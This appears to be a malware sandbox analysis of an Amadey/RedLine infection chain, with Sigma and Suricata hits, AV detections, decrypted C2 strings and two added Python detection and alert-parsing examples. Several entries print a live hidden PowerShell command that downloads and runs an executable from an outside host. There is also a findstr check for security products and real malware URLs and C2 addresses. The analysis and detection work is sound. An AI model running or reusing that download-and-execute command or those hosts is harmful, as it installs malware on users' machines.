Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1048, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", ProcessId: 1376, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6616, ProcessName: svchost.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 1464, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url
Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5444, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 6096, ProcessName: findstr.exe
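The Sigma hits in the sections above describe one infection chain: schtasks registering a task whose action is mshta on an .hta in Temp, mshta spawning a hidden PowerShell download-and-execute, wscript //B on a script under AppData, findstr grepping for security-product process names, and a .url dropped into the Startup folder. The block below is an added example written for this page, not Joe Sandbox's or Sigma's code: it evaluates five hand-written rules over constructed Sysmon-style events that copy the command lines shown in the report. The rule names and thresholds, the user-writable path list, and the AV process list (which adds msmpeng and mbamservice to the six names the sample checks) are the example's own assumptions.

```python
"""Sigma-style checks over process-creation (EventID 1) and file-creation
(EventID 11) events.  Added example for this page: rules and thresholds are
the author's own; SAMPLE_EVENTS copy the command lines from the report."""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"mshta", "wscript", "cscript"}
# Names the sample greps for, plus msmpeng/mbamservice (assumption, not from the report).
AV_PROCESSES = {"bdservicehost", "avastui", "avgui", "nswscsvc", "ekrn",
                "sophoshealth", "msmpeng", "mbamservice"}
DOWNLOAD_CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
TASK_ACTION = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)     # schtasks /tr "<action>"
SILENT_FLAG = re.compile(r"(?:^|\s)//?b(?:\s|$)", re.I)            # wscript //B or /B
SCRIPT_PATH = re.compile(r'[A-Za-z]:\\[^"]+?\.(?:js|jse|vbs|vbe|wsf)\b', re.I)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def exe_name(path):
    """'C:\\Windows\\SysWOW64\\wscript.EXE' -> 'wscript'; '' when the parent is unknown."""
    return PureWindowsPath(path).stem.lower() if path else ""


def rule_script_host_download_cradle(e):
    """PowerShell started by mshta/wscript/cscript with a download primitive on its command line."""
    return (e["EventID"] == 1 and exe_name(e["Image"]) in {"powershell", "pwsh"}
            and exe_name(e.get("ParentImage", "")) in SCRIPT_HOSTS
            and DOWNLOAD_CRADLE.search(e["CommandLine"]) is not None)


def rule_schtasks_script_host_task(e):
    """schtasks /create whose /tr action runs a script host on a file in a user-writable path."""
    if e["EventID"] != 1 or exe_name(e["Image"]) != "schtasks":
        return False
    cmd = e["CommandLine"]
    m = TASK_ACTION.search(cmd)
    if "/create" not in cmd.lower() or not m:
        return False
    action = (m.group(1) or m.group(2)).strip()
    launcher = exe_name(action.split()[0])
    return launcher in SCRIPT_HOSTS and any(p in action.lower() for p in USER_WRITABLE)


def rule_av_process_discovery(e):
    """findstr/tasklist/wmic naming two or more security-product processes."""
    if e["EventID"] != 1 or exe_name(e["Image"]) not in {"findstr", "tasklist", "wmic"}:
        return False
    tokens = re.findall(r"[a-z0-9_.-]+", e["CommandLine"].lower())
    hits = {t[:-4] if t.endswith(".exe") else t for t in tokens} & AV_PROCESSES
    return len(hits) >= 2


def rule_silent_script_host_from_appdata(e):
    """wscript/cscript run with //B (no UI, no error dialogs) on a script under AppData or Temp."""
    if e["EventID"] != 1 or exe_name(e["Image"]) not in {"wscript", "cscript"}:
        return False
    cmd = e["CommandLine"]
    m = SCRIPT_PATH.search(cmd)
    return (SILENT_FLAG.search(cmd) is not None and m is not None
            and any(p in m.group(0).lower() for p in USER_WRITABLE))


def rule_startup_folder_script_drop(e):
    """Executable, script or shortcut written into the per-user Startup folder."""
    if e["EventID"] != 11:
        return False
    target = e["TargetFilename"].lower()
    return ("\\start menu\\programs\\startup\\" in target
            and target.endswith((".url", ".lnk", ".js", ".vbs", ".hta", ".bat", ".cmd", ".exe", ".ps1")))


RULES = [rule_script_host_download_cradle, rule_schtasks_script_host_task, rule_av_process_discovery,
         rule_silent_script_host_from_appdata, rule_startup_folder_script_drop]


def evaluate(event):
    """Names of the rules the event matches."""
    return [r.__name__[len("rule_"):] for r in RULES if r(event)]


def triage(events):
    """ProcessId -> matched rule names, for events that hit at least one rule."""
    out = {}
    for e in events:
        hits = evaluate(e)
        if hits:
            out.setdefault(e["ProcessId"], []).extend(hits)
    return out


SAMPLE_EVENTS = [  # constructed from the report's Sigma hits, plus one benign control
    {"EventID": 1, "ProcessId": 1452, "Image": r"C:\Windows\SysWOW64\schtasks.exe", "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f'},
    {"EventID": 1, "ProcessId": 5708, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''},
    {"EventID": 1, "ProcessId": 1376, "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": "",
     "CommandLine": r'C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js"'},
    {"EventID": 1, "ProcessId": 6096, "Image": r"C:\Windows\SysWOW64\findstr.exe", "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": 'findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"'},
    {"EventID": 11, "ProcessId": 1464, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url"},
    {"EventID": 1, "ProcessId": 4242, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile Get-ChildItem C:\Users"},
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits)
```

The rules key on parent/child relationships and on where the launched file lives rather than on the exact strings in this sample, so the same task name or .hta renamed would still match; the benign control event (interactive PowerShell under explorer.exe) produces no hit.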
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-08T15:48:15.651968+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49852 | 104.21.16.1 | 443 | TCP
2025-03-08T15:51:37.663766+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49801 | 188.114.97.3 | 443 | TCP
2025-03-08T15:51:43.536352+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49809 | 104.21.16.1 | 443 | TCP
2025-03-08T15:51:43.888449+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49807 | 188.114.97.3 | 443 | TCP
2025-03-08T15:51:47.122131+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49814 | 104.21.16.1 | 443 | TCP
2025-03-08T15:51:48.956877+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49816 | 104.21.16.1 | 443 | TCP
2025-03-08T15:51:50.163287+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49817 | 104.21.16.1 | 443 | TCP
2025-03-08T15:51:53.735882+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49819 | 104.21.16.1 | 443 | TCP
2025-03-08T15:51:57.219222+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49822 | 104.21.16.1 | 443 | TCP
2025-03-08T15:51:57.318184+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49821 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:00.280850+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49825 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:00.451335+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49826 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:03.454802+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49828 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:06.358756+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49830 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:07.661756+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49832 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:09.912463+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49833 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:13.603796+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49836 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:13.849815+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49834 | 188.114.97.3 | 443 | TCP
2025-03-08T15:52:19.215776+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49842 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:24.119091+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49846 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:27.117185+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49850 | 104.21.16.1 | 443 | TCP
2025-03-08T15:52:23.945697+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49839 | 5.75.210.149 | 443 | TCP
2025-03-08T15:52:29.134677+0100 | 2045000 | 1 | Malware Command and Control Activity Detected | 101.99.92.190 | 40919 | 192.168.2.4 | 49847 | TCP
2025-03-08T15:48:15.651968+0100 | 2046056 | 1 | A Network Trojan was detected | 101.99.92.190 | 40919 | 192.168.2.4 | 49847 | TCP
2025-03-08T15:48:15.651968+0100 | 2045001 | 1 | Malware Command and Control Activity Detected | 101.99.92.190 | 40919 | 192.168.2.4 | 49847 | TCP
2025-03-08T15:48:29.396729+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.4 | 49715 | 176.113.115.6 | 80 | TCP
2025-03-08T15:52:00.653739+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49824 | 185.125.50.8 | 80 | TCP
2025-03-08T15:51:20.829634+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49796 | 176.113.115.7 | 80 | TCP
2025-03-08T15:51:31.897708+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49800 | 176.113.115.7 | 80 | TCP
2025-03-08T15:51:37.722400+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49804 | 176.113.115.7 | 80 | TCP
2025-03-08T15:51:45.270504+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49812 | 176.113.115.7 | 80 | TCP
2025-03-08T15:51:54.390797+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49820 | 176.113.115.7 | 80 | TCP
2025-03-08T15:52:06.557933+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49831 | 176.113.115.7 | 80 | TCP
2025-03-08T15:52:14.722306+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49838 | 176.113.115.7 | 80 | TCP
2025-03-08T15:52:20.624690+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49844 | 176.113.115.7 | 80 | TCP
2025-03-08T15:52:24.273181+0100 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49847 | 101.99.92.190 | 40919 | TCP
2025-03-08T15:52:29.382644+0100 | 2849351 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49847 | 101.99.92.190 | 40919 | TCP
2025-03-08T15:51:58.548551+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.4 | 49824 | 185.125.50.8 | 80 | TCP
2025-03-08T15:52:24.273181+0100 | 1800000 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49847 | 101.99.92.190 | 40919 | TCP
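The Suricata alert table as exported from the report runs every column together with no separator, and the IP/port run is genuinely ambiguous: 192.168.2.449852104.21.16.1443 reads as 192.168.2.4:49852 -> 104.21.16.1:443, but 192.168.2.44:9852 -> 104.21.16.144:3 is also a legal split. The block below is an added example, not part of the report or Joe Sandbox's code: it parses rows in that raw form by enumerating every legal IPv4/port split, scores the candidates (a well-known service port counts double, a Windows ephemeral port from 49152 up counts once), flags rows where the best score is tied, and then groups the severity-1 alerts by the remote endpoint so the C2 pairs fall out. Seven-digit Emerging Threats SIDs, TCP/UDP only, the two scoring preferences and the RFC 1918 test for the sandbox side are the example's assumptions; the sample rows are copied from this report.

```python
"""Parse Suricata alert rows in the run-together form of this report's export.
Added example for this page, not Joe Sandbox code.  Assumptions: 7-digit SIDs,
TCP/UDP only, and that the right IP/port split is the one that uses a
well-known service port and a Windows ephemeral port (49152+)."""
import ipaddress
import re

ROW = re.compile(
    r"^(\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d{6}[+-]\d{4})"   # timestamp with UTC offset
    r"(\d{7})(\d)"                                         # SID, severity
    r"([A-Za-z ]+)"                                        # classtype (never contains digits)
    r"([\d.]+)(TCP|UDP)$")                                 # src ip+port and dst ip+port, run together
WELL_KNOWN = {80, 443}
EPHEMERAL_MIN = 49152


def valid_octet(s):
    return s.isdigit() and len(s) <= 3 and (s == "0" or s[0] != "0") and int(s) <= 255


def valid_port(s):
    return s.isdigit() and len(s) <= 5 and s[0] != "0" and int(s) <= 65535


def candidate_splits(run):
    """Every (src_ip, src_port, dst_ip, dst_port) that is a legal reading of the run.
    Two dotted quads share one dot-separated middle field: <src4><sport><dst1>."""
    parts = run.split(".")
    if len(parts) != 7 or not all(valid_octet(p) for p in parts[:3] + parts[4:6]):
        return []
    mid, tail = parts[3], parts[6]
    found = []
    for a in range(1, 4):                      # digits in the last src octet
        for b in range(1, 6):                  # digits in the src port
            s4, sp, d1 = mid[:a], mid[a:a + b], mid[a + b:]
            if not (valid_octet(s4) and valid_port(sp) and valid_octet(d1)):
                continue
            for c in range(1, 4):              # digits in the last dst octet
                d4, dp = tail[:c], tail[c:]
                if valid_octet(d4) and valid_port(dp):
                    found.append((".".join(parts[:3] + [s4]), int(sp),
                                  ".".join([d1] + parts[4:6] + [d4]), int(dp)))
    return found


def plausibility(cand):
    return sum(2 if p in WELL_KNOWN else 1 if p >= EPHEMERAL_MIN else 0 for p in (cand[1], cand[3]))


def parse_row(row):
    m = ROW.match(row.strip())
    if not m:
        raise ValueError("unrecognised row: %r" % row)
    ts, sid, sev, classtype, run, proto = m.groups()
    cands = candidate_splits(run)
    if not cands:
        raise ValueError("no legal IP/port split in %r" % run)
    best = max(cands, key=plausibility)
    top = plausibility(best)
    return {"timestamp": ts, "sid": int(sid), "severity": int(sev), "classtype": classtype.strip(),
            "proto": proto, "src_ip": best[0], "src_port": best[1], "dst_ip": best[2], "dst_port": best[3],
            # True when another split scores as well: that row needs a manual check
            "ambiguous": sum(plausibility(c) == top for c in cands) > 1}


def remote_endpoints(rows, severity_at_most=1):
    """Alerts of the given severity or worse (1 is worst), grouped by the non-RFC1918 side -> sorted SIDs."""
    out = {}
    for r in rows:
        if r["severity"] > severity_at_most:
            continue
        if ipaddress.ip_address(r["src_ip"]).is_private:
            key = (r["dst_ip"], r["dst_port"])
        else:
            key = (r["src_ip"], r["src_port"])
        out.setdefault(key, set()).add(r["sid"])
    return {k: sorted(v) for k, v in out.items()}


SAMPLE_ROWS = [  # copied from this report's alert table
    "2025-03-08T15:48:15.651968+010020283713Unknown Traffic192.168.2.449852104.21.16.1443TCP",
    "2025-03-08T15:52:23.945697+010020287653Unknown Traffic192.168.2.4498395.75.210.149443TCP",
    "2025-03-08T15:52:29.134677+010020450001Malware Command and Control Activity Detected101.99.92.19040919192.168.2.449847TCP",
    "2025-03-08T15:48:29.396729+010028561471A Network Trojan was detected192.168.2.449715176.113.115.680TCP",
    "2025-03-08T15:52:00.653739+010028561481A Network Trojan was detected192.168.2.449824185.125.50.880TCP",
    "2025-03-08T15:52:24.273181+010028496621Malware Command and Control Activity Detected192.168.2.449847101.99.92.19040919TCP",
    "2025-03-08T15:51:20.829634+010028033053Unknown Traffic192.168.2.449796176.113.115.780TCP",
]

if __name__ == "__main__":
    parsed = [parse_row(r) for r in SAMPLE_ROWS]
    for p in parsed:
        print(p["sid"], p["severity"], p["src_ip"], p["src_port"], "->", p["dst_ip"], p["dst_port"], p["classtype"])
    print(remote_endpoints(parsed))
```

The second sample row has twelve legal splits; the scoring picks 192.168.2.4:49839 -> 5.75.210.149:443 with a clear margin, and none of the report's rows ends in a tie. The severity-1 grouping returns the three remote endpoints that the report's C2 and Network Trojan rules fired on, with the inbound 101.99.92.190:40919 alerts and the outbound ones to the same port folded into one key.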


AV Detection

Source: random.exe | Avira: detected
Source: http://176.113.115.7/files/5526411762/CgmaT61.exe | Avira URL Cloud: Label: malware
Source: https://garagedrootz.top/oPsoJANer | Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/5526411762/yUI6F6C.exe | Avira URL Cloud: Label: malware
Source: https://garagedrootz.top:443/oPsoJAN | Avira URL Cloud: Label: malware
Source: https://garagedrootz.top/ | Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/6691015685/V0Bt74c.exe | Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/6691015685/V0Bt74c.exe. | Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7098980627/mAtJWNv.exe | Avira URL Cloud: Label: malware
Source: https://garagedrootz.top/oPsoJANX | Avira URL Cloud: Label: malware
Source: https://garagedrootz.top/oPsoJAN | Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7868598855/zY9sqWs.exe | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exe | Avira: detection malicious, Label: TR/AD.RedLineSteal.wcbyn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exe | Avira: detection malicious, Label: TR/AD.RedLineSteal.wcbyn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\CgmaT61[1].exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe | Avira: detection malicious, Label: TR/AVI.Amadey.itpsl
Source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe | Avira: detection malicious, Label: TR/AD.Nekark.ccjuh
Source: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe | Avira: detection malicious, Label: TR/AVI.Amadey.itpsl
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe | Avira: detection malicious, Label: TR/AD.Nekark.ccjuh
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Avira: detection malicious, Label: TR/AD.Nekark.qnifa
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yUI6F6C[1].exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\V0Bt74c[1].exe | Avira: detection malicious, Label: TR/AD.Nekark.qnifa
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yUI6F6C[1].exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\CgmaT61[1].exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\V0Bt74c[1].exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ADFoyxP[1].exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ReK7Ewx[1].exe | ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\10141790101\ADFoyxP.exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | ReversingLabs: Detection: 60%
Source: random.exe | Virustotal: Detection: 48%
Source: random.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: 176.113.115.6
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: /Ni9kiput/index.php
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: S-%lu-
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: bb556cff4a
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: rapes.exe
